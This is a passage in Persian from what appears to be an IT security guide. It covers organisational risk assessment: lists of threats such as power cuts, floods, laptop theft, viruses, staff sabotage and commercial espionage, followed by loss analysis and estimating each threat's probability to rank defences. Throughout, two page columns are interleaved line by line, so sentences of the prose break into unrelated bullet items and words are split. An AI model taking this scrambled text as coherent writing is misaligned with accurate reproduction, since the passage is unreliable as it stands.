‫ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺷﻬﺮﻱ )ﺗﻠﻔﻦ‪ ،‬ﺑﺮﻕ‪ ،‬ﺁﺏ( ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﻛﻮﺗﺎﻩ؛‬ ‫•‬ ‫ﺳﻮﺍﺑﻖ ﻛﺎﺭﻛﻨﺎﻥ؛ ﻭ‬ ‫‪o‬‬
‫ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺷﻬﺮﻱ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ؛‬ ‫•‬ ‫ﺍﺳﻨﺎﺩ ﺣﺴﺎﺑﺮﺳﻲﺷﺪﻩ‪.‬‬ ‫‪o‬‬
‫ﺻﺎﻋﻘﻪ؛‬ ‫•‬
‫ﺳﻴﻞ؛‬ ‫•‬ ‫ﻣﻮﺍﺭﺩ ﻏﻴﺮﻣﻠﻤﻮﺱ‪:‬‬
‫ﺳﺮﻗﺖ ﺩﻳﺴﻜﻬﺎ ﻳﺎ ﻧﻮﺍﺭﻫﺎ؛‬ ‫•‬ ‫ﺍﻣﻨﻴﺖ ﻭ ﺳﻼﻣﺖ ﻛﺎﺭﻛﻨﺎﻥ؛‬ ‫‪o‬‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﻳﻚ ﻓﺮﺩ ﻛﻠﻴﺪﻱ؛‬ ‫•‬ ‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ؛‬ ‫‪o‬‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﺔ ﺧﺎﻧﮕﻲ ﻳﻚ ﻓﺮﺩ ﻛﻠﻴﺪﻱ؛‬ ‫•‬ ‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﻛﻨﺎﻥ؛‬ ‫‪o‬‬
‫ﻭﺭﻭﺩ ﻳﻚ ﻭﻳﺮﻭﺱ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ؛‬ ‫•‬ ‫ﻭﺟﻬﺔ ﻋﻤﻮﻣﻲ ﻭ ﺍﻋﺘﺒﺎﺭ ﺳﺎﺯﻣﺎﻥ؛‬ ‫‪o‬‬
‫ﻭﺭﺷﻜـﺴﺘﮕﻲ ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﻳـﺎ ﺷــﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋـﻪﺩﻫﻨــﺪﺓ‬ ‫•‬
‫ﺧﺪﻣﺎﺕ ﻛﻠﻴﺪﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎ ﺷﻤﺎ؛‬ ‫‪69‬‬ ‫‪Business Plan‬‬
‫‪١٤٣‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﻢ‪ .‬ﻳﻚ ﺷﻴﻮﺓ ﭘﻴﭽﻴﺪﻩﺗـ ﹺﺮ‬ ‫ﺍﺷﻜﺎﻻﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ؛‬ ‫•‬
‫ﺍﺣﺘﺴﺎﺏ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﻋـﺪﻡ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ‪ ،‬ﺁﻣـﻮﺯﺵ ﻣﺠـﺪﺩ‪،‬‬ ‫ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛‬ ‫•‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﺍﺿﺎﻓﻪﺷـﺪﺓ ﻧﺎﺷـﻲ ﺍﺯ ﺁﺳـﻴﺐ‪ ،‬ﺍﺯ ﺩﺳـﺖ ﺭﻓـﺘﻦ ﺍﻋﺘﺒـﺎﺭ‬ ‫ﺧﺮﺍﺑﻜﺎﺭﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ؛‬ ‫•‬
‫ﺷﺮﻛﺖ‪ ،‬ﻭ ﺣﺘﻲ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﺷﺪﻩ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺷﺮﻛﺖ ﺍﺳﺖ‪.‬‬ ‫ﺧﺮﺍﺑﻜﺎﺭﻱ ﭘﺮﺳـﻨﻞ ﺷـﺨﺺ ﺛﺎﻟـﺚ )ﻣـﺜ ﹰ‬
‫ﻼ ﻛﺎﺭﻣﻨـﺪ ﺑﺨـﺶ‬ ‫•‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻓﺰﻭﺩﻥ ﻋﻮﺍﻣﻞ ﺟـﺎﻧﺒﻲ ﺑـﻪ ﻣﺤﺎﺳـﺒﺔ ﻫﺰﻳﻨـﻪ ﺑﺎﻋـﺚ‬ ‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ(؛‬
‫ﺯﺣﻤﺖ ﺑﻴﺸﺘﺮﻱ ﻣﻲﺷﻮﺩ ﻭﻟﻲ ﺩﻗﺖ ﺗﺨﻤﻴﻦ ﺭﺍ ﺑﺎﻻ ﻣـﻲﺑـﺮﺩ‪ .‬ﺩﺭ‬ ‫ﺍﻏﺘﺸﺎﺵ ﻛﺎﺭﻛﻨﺎﻥ؛‬ ‫•‬
‫ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ ﻧﻴﺎﺯﻱ ﺑﻪ ﺗﻌﻴﻴﻦ ﺩﻗﻴﻖ ﺍﺭﺯﺵ ﻭ ﻫﺰﻳﻨﺔ ﻫـﺮ ﻣﺨـﺎﻃﺮﻩ‬ ‫ﻣﻬﺎﺟﻤﻴﻨﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ ﺑـﻪ ﻣﺎﺷـﻴﻨﻬﺎﻱ ﺷـﻤﺎ‬ ‫•‬
‫ﻧﻴﺴﺖ ﻭ ﺩﺭ ﺣﺎﻟﺖ ﻋﺎﺩﻱ ﺍﺧﺘﺼﺎﺹ ﻳﻚ ﺑﺎﺯﻩ ﻳﺎ ﻣﺤﺪﻭﺩﺓ ﻫﺰﻳﻨﻪ‬ ‫ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ؛‬
‫ﺑﺮﺍﻱ ﻫﺮ ﺗﻬﺪﻳﺪ ﻛﻔﺎﻳﺖ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﻗﻼﻡ ﺁﺳـﻴﺐﺩﻳـﺪﻩ ﺭﺍ‬ ‫ﻛــﺎﺭﺑﺮﺍﻧﻲ ﻛــﻪ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﺍﻃﻼﻋــﺎﺕ ﺳــﺎﺯﻣﺎﻧﻲ‬ ‫•‬
‫ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺩﺳــﺘﺔ ﺍﻗــﻼﻡ ﻏﻴﺮﻗﺎﺑــﻞ ﺗﻌﻤﻴــﺮ ﻭ ﺟــﺎﻳﮕﺰﻳﻨﻲ ﻳــﺎ‬ ‫ﺗﺤﺮﻳﻚﻛﻨﻨﺪﻩ ﻳﺎ ﺍﻧﺤﺼﺎﺭﻱ ﻣﻲﻓﺮﺳﺘﻨﺪ؛ ﻭ‬
‫ﺟﺒﺮﺍﻥﻧﺎﭘﺬﻳﺮ ﻗـﺮﺍﺭ ﺩﺍﺩ؛ ﻣﺜـﻞ ﭘـﺎﻙ ﺷـﺪﻥ ﻛﺎﻣـﻞ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﺓ‬ ‫ﺟﺎﺳﻮﺳﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﺗﺠﺎﺭﻱ‪.‬‬ ‫•‬
‫ﺣﺴﺎﺑﻬﺎ‪ ،‬ﻳﺎ ﻣﺮﮒ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻛﻠﻴﺪﻱ‪ .‬ﺷـﺎﻳﺪ ﺑﺨﻮﺍﻫﻴـﺪ ﻫﺰﻳﻨـﺔ‬
‫ﺍﻳﻦ ﺧﺴﺎﺭﺗﻬﺎ ﺭﺍ ﺑﺎ ﻣﻘﻴﺎﺳﻬﺎ ﻇﺮﻳﻔﺘﺮﻱ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴـﺪ؛‬ ‫ﻣﺤﺎﺳﺒﺔ ﻣﺨﺎﻃﺮﺍﺕ‬
‫ﻼ ﺑﺮﺍﻱ ﻫﺮﻳـﻚ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺫﻳـﻞ ﻫﺰﻳﻨـﺔ ﺟﺪﺍﮔﺎﻧـﻪﺍﻱ ﺩﺭﻧﻈـﺮ‬ ‫ﻣﺜ ﹰ‬ ‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﻳﻜﺒـﺎﺭ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ ﻭ ﭘـﺲ ﺍﺯ ﺁﻥ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺑﮕﻴﺮﻳﺪ‪:‬‬ ‫ﻓﺮﺍﻣﻮﺵ ﮔﺮﺩﺩ‪ ،‬ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻫﻤﻮﺍﺭﻩ ﻭ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ‪ -‬ﺣـﺪﺍﻗﻞ‬


‫ﻳﻜﺒﺎﺭ ﺩﺭ ﺳﺎﻝ ﻳﺎ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻋﻤـﺪﻩﺍﻱ ﺩﺭ ﻛﺎﺭﻛﻨـﺎﻥ‪،‬‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺩﺭ ﻛﻮﺗﺎﻩﻣﺪﺕ )ﻛﻤﺘﺮ ﺍﺯ ‪ ۷‬ﺗﺎ ‪ ۱۰‬ﺭﻭﺯ(؛‬ ‫•‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﻣﺤﻴﻂ ﻋﻤﻠﻴﺎﺗﻲ ﺻﻮﺭﺕ ﻣـﻲﭘـﺬﻳﺮﺩ ‪ -‬ﺁﻧـﺮﺍ ﺍﻧﺠـﺎﻡ‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺩﺭ ﻣﻴﺎﻥﻣﺪﺕ )‪ ۱‬ﺍﻟﻲ ‪ ۲‬ﻫﻔﺘﻪ(؛‬ ‫•‬
‫ﺩﻫﻴﺪ‪ ٧٠.‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺗﻐﻴﻴـﺮ ﺟـﺪﻱ ﺩﺭ ﺳـﺎﺧﺘﺎﺭ ﻳـﺎ‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺩﺭ ﺩﺭﺍﺯﻣﺪﺕ )ﺑﻴﺶ ﺍﺯ ‪ ۲‬ﻫﻔﺘﻪ(؛‬ ‫•‬
‫ﻋﻤﻠﻴﺎﺕ ﺭﺥ ﻣﻲﺩﻫﺪ ﻣﺠﺪﺩﹰﺍ ﺑﺎﻳﺪ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍ ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗـﺮﺍﺭ‬
‫ﺯﻳﺎﻥ ﻳﺎ ﺗﺨﺮﻳﺐ ﺩﺍﺋﻤﻲ؛‬ ‫•‬
‫ﺩﺍﺩ‪ .‬ﻟﺬﺍ ﺍﮔﺮ ﺷﻤﺎ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻣﺠـﺪﺩ ﻣـﻲﻛﻨﻴـﺪ‪ ،‬ﺑـﻪ ﺳـﺎﺧﺘﻤﺎﻥ‬
‫ﺯﻳﺎﻥ ﻳﺎ ﺗﺨﺮﻳﺐ ﺗﺼﺎﺩﻓﻲ؛‬ ‫•‬
‫ﺟﺪﻳـﺪ ﻣـﻲﺭﻭﻳـﺪ‪ ،‬ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﻃـﺮﻑ ﻗـﺮﺍﺭﺩﺍﺩ ﺧـﻮﺩ ﺭﺍ ﺗﻐﻴﻴــﺮ‬
‫ﺯﻳﺎﻥ ﻳﺎ ﺗﺨﺮﻳﺐ ﺗﻌﻤﺪﻱ؛‬ ‫•‬
‫ﻣﻲﺩﻫﻴﺪ ﻭ ﻳﺎ ﺗﻐﻴﻴﺮ ﺟﺪﻱ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺍﻳﺠـﺎﺩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ‪ ،‬ﺑﺎﻳـﺪ‬
‫ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﺳﺎﺯﻣﺎﻥ؛‬ ‫•‬
‫ﻣﺠﺪﺩﹰﺍ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﺁﺳﻴﺒﻬﺎﻱ ﺑﺎﻟﻘﻮﻩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ؛‬ ‫•‬
‫ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﻭ ﻛﺎﻣﻞ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﻫﻤـﺔ ﻣﻨـﺎﺑﻊ‬ ‫•‬ ‫ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ‬
‫ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﺭﻗﺒﺎ ﻭ ﻣﻄﺒﻮﻋﺎﺕ؛ ﻭ‬
‫ﺗﻌﻴﻴﻦ ﻫﺰﻳﻨﺔ ﺧﺴﺎﺭﺗﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﻴﺎﺭ ﺳـﺨﺖ ﺑﺎﺷـﺪ‪ .‬ﻳـﻚ‬
‫ﻫﺰﻳﻨﺔ ﺟﺎﻳﮕﺰﻳﻨﻲ ﻳﺎ ﺗﺮﻣﻴﻢ‪.‬‬ ‫•‬
‫ﺷﻴﻮﺓ ﺳﺎﺩﺓ ﻣﺤﺎﺳﺒﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﻫﺰﻳﻨﺔ ﺗﻌﻤﻴﺮ ﻳﺎ ﺗﻌـﻮﻳﺾ‬
‫ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﻥ‬
‫ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺍﺣﺘﻤﺎﻝ ﺭﺧـﺪﺍﺩ‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﻛﺎﺭﻛﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺳﺘﺨﺪﺍﻡ ﻭ ﺑﺎﺯﻧﺸﺴﺘﮕﻲ ﺗﻌﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺍﺯ‬ ‫‪۷۰‬‬
‫ﻫﺮ ﺍﺗﻔﺎﻕ ﺭﺍ ﺗﺨﻤﻴﻦ ﺑﺰﻧﻴﺪ‪ .‬ﺗﺨﻤـﻴﻦ ﺳـﺎﻻﻧﺔ ﺍﻳـﻦ ﺗﻬﺪﻳـﺪﺍﺕ ﺍﺯ‬ ‫ﺍﻓﺮﺍﺩ ﺑﺎﺷﺪ‪ ،‬ﻳﺎ ﺑﺎﺯﻧﺸﺴﺘﮕﻲ ﻳﻜﻲ ﺍﺯ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﻃﺮﺡ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﻭﺷﻬﺎ ﺍﺳﺖ‪ .‬ﺗﻌﻴﻴﻦ ﻛﻤﻴﺖ ﻳﻚ ﻣﺨﺎﻃﺮﻩ ﻛﺎﺭ ﺑـﺴﻴﺎﺭ‬ ‫ﻓﻌﺎﻟﻴﺖ ﺩﺍﺷﺘﻪ ﺍﺳـﺖ‪ .‬ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﻧـﺼﺐ ﭼﻨـﺪ‬
‫ﺩﺷﻮﺍﺭﻱ ﺍﺳﺖ‪ .‬ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳﻖ ﺷﺮﻛﺘﻬﺎﻱ ﺩﻳﮕـﺮ )ﻣﺜـﻞ‬ ‫ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ‪ ۱۰۰‬ﺭﺍﻳﺎﻧﻪ ﺩﺍﺭﻳﺪ ﻭ ﺑﺎ ﺭﻋﺎﻳﺖ ﺍﺻﻮﻝ ﺍﻳﻤﻨﻲ ‪۱‬‬
‫ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺿﺎﻓﻪ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﻣﺨـﺎﻃﺮﺍﺕ ﺿـﺮﻭﺭﻱ‬
‫ﺷﺮﻛﺖ ﺑﻴﻤﻪ( ﺍﻳﻦ ﺑﺮﺁﻭﺭﺩﻫﺎ ﺭﺍ ﺑﺪﺳـﺖ ﺁﻭﺭﻳـﺪ‪ .‬ﺍﮔـﺮ ﻭﺍﻗﻌـﻪ ﺑـﺮﺍﻱ‬ ‫ﻼ ‪ ۱۰‬ﺭﺍﻳﺎﻧﻪ ﺩﺍﺭﻳﺪ ﻭ ‪ ۱۰‬ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺍﺿﺎﻓﻪ ﻣﻲﻛﻨﻴﺪ‪،‬‬
‫ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﻣﺜ ﹰ‬
‫ﭼﻨﺪ ﺑﺎﺭ ﻣﺘﻮﺍﻟﻲ ﺭﺥ ﺩﺍﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﺮ ﺍﺳﺎﺱ ﺳﻮﺍﺑﻖ ﻧﻴـﺰ ﻣـﻲﺗـﻮﺍﻥ‬ ‫ﻼ ﺟﺪﻳـﺪ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ‬ ‫ﺍﻳﻦ ﺗﻮﺳﻌﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺟﻨﺒـﺔ ﻛـﺎﻣ ﹰ‬
‫ﻻ ﺁﻣﺎﺭﻫـﺎﻳﻲ ﺟﻤـﻊ‪-‬‬ ‫ﺁﻧﺮﺍ ﺗﺨﻤﻴﻦ ﺯﺩ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺻﻨﻌﺘﻲ ﻣﻌﻤـﻮ ﹰ‬ ‫ﺑﻮﺟﻮﺩ ﺑﻴﺎﻭﺭﺩ‪ .‬ﺗﻐﻴﻴﺮﺍﺕ ﺩﻳﮕﺮ ﺳﻴﺴﺘﻤﻬﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺷـﺎﻣﻞ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺟﺪﻳـﺪ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ‪ ،‬ﺍﺭﺗﻘـﺎﻱ ﺳﻴـﺴﺘﻤﻬﺎ‪ ،‬ﻳـﺎ ﺍﻳﺠـﺎﺩ‬
‫ﺁﻭﺭﻱ ﻭ ﮔﺰﺍﺭﺷﺎﺗﻲ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺷﻤﺎ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺣﺪﺳﻴﺎﺕ‬ ‫ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﺑﺴﺘﺮ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﺷـﻨﺪ‪ .‬ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﻧﻴـﺰ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﻪ ﺑﻪ ﻭﺍﻗﻌﻴـﺖ ﻧﺰﺩﻳﻜﺘـﺮ ﻛﻨﻴـﺪ‪.‬‬ ‫ﻣﻌﻤﻮ ﹰﻻ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺭﺷﺪ ﺳـﺮﻳﻊ‪ ،‬ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻳـﺎ‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪:‬‬ ‫ﻣﺸﺘﺮﻳﺎﻥ ﺧﺎﺭﺟﻲ‪ ،‬ﻭ ﻧﻴﺰ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺷـﻤﺎ ﺭﺍ‬
‫ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻣﺤﻠﻲ ﻭ ﺟﻬﺎﻧﻲ ﺑﻴﺸﺘﺮ ﺟﺎ ﺑﻴﺎﻧﺪﺍﺯﻧﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٤٤‬‬

‫ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺑﺪﺍﻧﻴﺪ‪ .‬ﺍﮔﺮ ﺧﻴﻠـﻲ ﺩﻗﻴـﻖ ﻫـﺴﺘﻴﺪ‬ ‫ﺷــﺮﻛﺖ ﺑــﺮﻕ ﺑــﺮ ﺍﺳــﺎﺱ ﺗﺠﺮﺑــﺔ ﺳــﺎﻝ ﮔﺬﺷــﺘﺔ ﺧــﻮﺩ‬ ‫•‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺣﺘﻤـﺎﻝ ﻧﺎﻣﻨﺎﺳـﺐ ﺑـﻮﺩﻥ ﺗﻤﻬﻴـﺪﺍﺕ ﺩﻓـﺎﻋﻲ ﺭﺍ ﻧﻴـﺰ‬ ‫ﺑﺮﺁﻭﺭﺩﻱ ﺍﺯ ﺍﺣﺘﻤﺎﻝ ﻗﻄﻊ ﺑﺮﻕ ﺩﺭ ﺧﻼﻝ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺩﺍﺭﺩ‪.‬‬
‫ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ‪ .‬ﺍﻛﻨﻮﻥ ﻓﺮﺁﻳﻨﺪ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻦ‬ ‫ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺨﺎﻃﺮﺓ ﻗﻄﻊ ﺑﺮﻕ ﺑـﺮﺍﻱ‬
‫ﻼ ﺭﻭﺷـﻦ ﺍﺳـﺖ‪ .‬ﻛﺎﻓﻴـﺴﺖ‬ ‫ﻳﺎ ﻧﮕﺮﻓﺘﻦ ﻫﺮ ﻣﻜﺎﻧﻴﺰﻡ ﺩﻓﺎﻋﻲ ﻛﺎﻣ ﹰ‬ ‫ﭼﻨﺪ ﺛﺎﻧﻴﻪ‪ ،‬ﭼﻨﺪ ﺩﻗﻴﻘﻪ‪ ،‬ﻭ ﻳﺎ ﭼﻨﺪ ﺳﺎﻋﺖ ﻣﺤﺎﺳﺒﻪ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺷﻤﺎ ﺿﺮﺭ ﻣﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ ﻫـﺮ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ ﺩﺭ ﺍﺣﺘﻤـﺎﻝ ﻭﻗـﻮﻉ ﺁﻥ‬ ‫ﺳﻮﺍﺑﻖ ﭘﺮﺳﻨﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺗﺨﻤـﻴﻦ ﺍﺣﺘﻤـﺎﻝ ﺍﺳـﺘﻌﻔﺎﻱ‬ ‫•‬
‫ﺿﺮﺏ ﻛﻨﻴﺪ ﺗﺎ ﺑﺮﺍﻱ ﻫﺮ ﺗﻬﺪﻳﺪ ﻳﻚ ﻛﻤﻴـﺖ ﺑﺪﺳـﺖ ﺁﻳـﺪ‪ .‬ﺍﻳـﻦ‬ ‫ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻛﻠﻴﺪﻱ ﺑﺨﺶ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻛﻨﺪ‪.‬‬
‫ﺍﺭﻗﺎﻡ ﺭﺍ ﺑﻪ ﺗﺮﺗﻴﺐ ﻧﺰﻭﻟﻲ ﻣﺮﺗﺐ ﻧﻤﺎﻳﻴـﺪ ﻭ ﻛﻤﻴـﺖ ﻣﺘﻨـﺎﻇﺮ ﻫـﺮ‬
‫ﺗﻬﺪﻳﺪ ﺭﺍ ﺑﺎ ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ ﺁﻥ ﻣﻘﺎﻳﺴﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﺧﻮﺷﺒﻴﻨﺎﻧﻪﺗـﺮﻳﻦ ﺣﺪﺳـﻴﺎﺕ ﺩﺭ ﻣـﻮﺭﺩ ﺗﻜـﺮﺍﺭ ﺗﺠﺮﺑﻴـﺎﺕ‬ ‫•‬
‫ﮔﺬﺷﺘﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺨﻤﻴﻦ ﺍﺣﺘﻤﺎﻝ ﻛﺸﻒ ﺍﺷﻜﺎﻻﺕ‬
‫ﻧﺘﻴﺠﺔ ﺍﻳﻦ ﻣﻘﺎﻳﺴﻪ ﻓﻬﺮﺳﺘﻲ ﺍﺳﺖ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱ ﺷـﺪﻩ ﺍﺯ ﺁﻧﭽـﻪ‬ ‫ﺟﺪﻱ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﻤﺎ ﺩﺭ ﺧﻼﻝ ﺳﺎﻝ ﺁﻳﻨـﺪﻩ ﻣـﻮﺭﺩ‬
‫ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺩﺭ ﺍﺑﺘـﺪﺍ ﻛﻤـﻲ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺗﻌﺠﺐﺁﻭﺭ ﺑﺎﺷﺪ‪ .‬ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﻫﺪﻑ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬
